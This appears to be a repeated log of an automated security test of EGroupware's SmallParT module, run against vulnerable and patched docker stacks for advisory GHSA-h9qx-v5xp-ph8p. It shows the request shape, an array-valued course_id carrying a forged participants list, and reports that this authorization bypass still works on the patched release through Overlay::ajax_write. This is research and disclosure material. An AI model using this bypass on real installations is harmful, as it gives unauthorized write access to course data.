[+] Ensuring docker images are present... ========================================================== GHSA-h9qx-v5xp-ph8p variant/bypass analysis @ 2026-07-07T22:51:59Z ========================================================== [+] ### VULNERABLE stack (26.2.20260216) ### [+] Starting egw_db_vuln (tag 26.2.20260216) [+] Waiting for egw_db_vuln to be healthy... [+] Starting egroupware_vuln / egw_nginx_vuln [+] Waiting for egroupware_vuln install to finish (attempt 1)... [+] Ensuring docker images are present... ========================================================== GHSA-h9qx-v5xp-ph8p variant/bypass analysis @ 2026-07-07T23:30:09Z ========================================================== [+] ### VULNERABLE stack (26.2.20260216) ### [+] Starting egw_db_vuln (tag 26.2.20260216) [+] Waiting for egw_db_vuln to be healthy... [+] Starting egroupware_vuln / egw_nginx_vuln [+] Waiting for egroupware_vuln install to finish (attempt 1)... [+] egroupware_vuln ready after 8x5s (attempt 1) [+] vuln attacker_id=7 [+] attacker logged in on egroupware_vuln {"response":[{"type":"message","data":{"message":"Permission denied!","type":"error"}}],"page_generation_time":"0.02"} [+] [26.2.20260216] control (int course_id): denied=1 {"response":[{"type":"message","data":{"message":"Invalid argument EGroupware\\SmallParT\\Overlay::write({\"course_id\":{\"participants\":[{\"account_id\":7,\"name\":\"Test\",\"joined_at\":\"2026-01-10\",\"participant_role\":3}],\"account_id\":\"7\",\"course_id\":\"1\"},\"video_id\":1,\"overlay_type\":\"smallpart-text\",\"overlay_start\":0,\"overlay_data\":\"{}\"})","type":"error"}}],"page_generation_time":"0.00","session_restore_time":"0.00"} [+] [26.2.20260216] bypass (array course_id): denied=0 past_acl=1 26.2.20260216 authz_bypass=1 ctrl_denied=1 bypass_denied=0 bypass_past_acl=1 [+] ### FIXED stack (26.2.20260224) ### [+] Starting egw_db_fixed (tag 26.2.20260224) [+] Waiting for egw_db_fixed to be healthy... [+] Starting egroupware_fixed / egw_nginx_fixed [+] Waiting for egroupware_fixed install to finish (attempt 1)... [+] egroupware_fixed ready after 9x5s (attempt 1) [+] fixed attacker_id=7 [+] attacker logged in on egroupware_fixed {"response":[{"type":"message","data":{"message":"Permission denied!","type":"error"}}],"page_generation_time":"0.02"} [+] [26.2.20260224] control (int course_id): denied=1 {"response":[{"type":"message","data":{"message":"Invalid argument EGroupware\\SmallParT\\Overlay::write({\"course_id\":{\"participants\":[{\"account_id\":7,\"name\":\"Test\",\"joined_at\":\"2026-01-10\",\"participant_role\":3}],\"account_id\":\"7\",\"course_id\":\"1\"},\"video_id\":1,\"overlay_type\":\"smallpart-text\",\"overlay_start\":0,\"overlay_data\":\"{}\"})","type":"error"}}],"page_generation_time":"0.00","session_restore_time":"0.00"} [+] [26.2.20260224] bypass (array course_id): denied=0 past_acl=1 26.2.20260224 authz_bypass=1 ctrl_denied=1 bypass_denied=0 bypass_past_acl=1 [+] ==================== VERDICT ==================== [+] vuln authz_bypass=1 ctrl_denied=1 past_acl=1 [+] fixed authz_bypass=1 ctrl_denied=1 past_acl=1 [+] ================================================ [+] RESULT: VARIANT CONFIRMED — isParticipant() authz bypass still works on the FIXED version (26.2.20260224) via Overlay::ajax_write. [+] Ensuring docker images are present... ========================================================== GHSA-h9qx-v5xp-ph8p variant/bypass analysis @ 2026-07-07T23:32:06Z ========================================================== [+] ### VULNERABLE stack (26.2.20260216) ### [+] Starting egw_db_vuln (tag 26.2.20260216) [+] Waiting for egw_db_vuln to be healthy... [+] Starting egroupware_vuln / egw_nginx_vuln [+] Waiting for egroupware_vuln install to finish (attempt 1)... [+] egroupware_vuln ready after 9x5s (attempt 1) [+] vuln attacker_id=7 [+] attacker logged in on egroupware_vuln {"response":[{"type":"message","data":{"message":"Permission denied!","type":"error"}}],"page_generation_time":"0.02"} [+] [26.2.20260216] control (int course_id): denied=1 {"response":[{"type":"message","data":{"message":"Invalid argument EGroupware\\SmallParT\\Overlay::write({\"course_id\":{\"participants\":[{\"account_id\":7,\"name\":\"Test\",\"joined_at\":\"2026-01-10\",\"participant_role\":3}],\"account_id\":\"7\",\"course_id\":\"1\"},\"video_id\":1,\"overlay_type\":\"smallpart-text\",\"overlay_start\":0,\"overlay_data\":\"{}\"})","type":"error"}}],"page_generation_time":"0.00","session_restore_time":"0.00"} [+] [26.2.20260216] bypass (array course_id): denied=0 past_acl=1 26.2.20260216 authz_bypass=1 ctrl_denied=1 bypass_denied=0 bypass_past_acl=1 [+] ### FIXED stack (26.2.20260224) ### [+] Starting egw_db_fixed (tag 26.2.20260224) [+] Waiting for egw_db_fixed to be healthy... [+] Starting egroupware_fixed / egw_nginx_fixed [+] Waiting for egroupware_fixed install to finish (attempt 1)... [+] egroupware_fixed ready after 7x5s (attempt 1) [+] fixed attacker_id=7 [+] attacker logged in on egroupware_fixed {"response":[{"type":"message","data":{"message":"Permission denied!","type":"error"}}],"page_generation_time":"0.02"} [+] [26.2.20260224] control (int course_id): denied=1 {"response":[{"type":"message","data":{"message":"Invalid argument EGroupware\\SmallParT\\Overlay::write({\"course_id\":{\"participants\":[{\"account_id\":7,\"name\":\"Test\",\"joined_at\":\"2026-01-10\",\"participant_role\":3}],\"account_id\":\"7\",\"course_id\":\"1\"},\"video_id\":1,\"overlay_type\":\"smallpart-text\",\"overlay_start\":0,\"overlay_data\":\"{}\"})","type":"error"}}],"page_generation_time":"0.00","session_restore_time":"0.00"} [+] [26.2.20260224] bypass (array course_id): denied=0 past_acl=1 26.2.20260224 authz_bypass=1 ctrl_denied=1 bypass_denied=0 bypass_past_acl=1 [+] ==================== VERDICT ==================== [+] vuln authz_bypass=1 ctrl_denied=1 past_acl=1 [+] fixed authz_bypass=1 ctrl_denied=1 past_acl=1 [+] ================================================ [+] RESULT: VARIANT CONFIRMED — isParticipant() authz bypass still works on the FIXED version (26.2.20260224) via Overlay::ajax_write.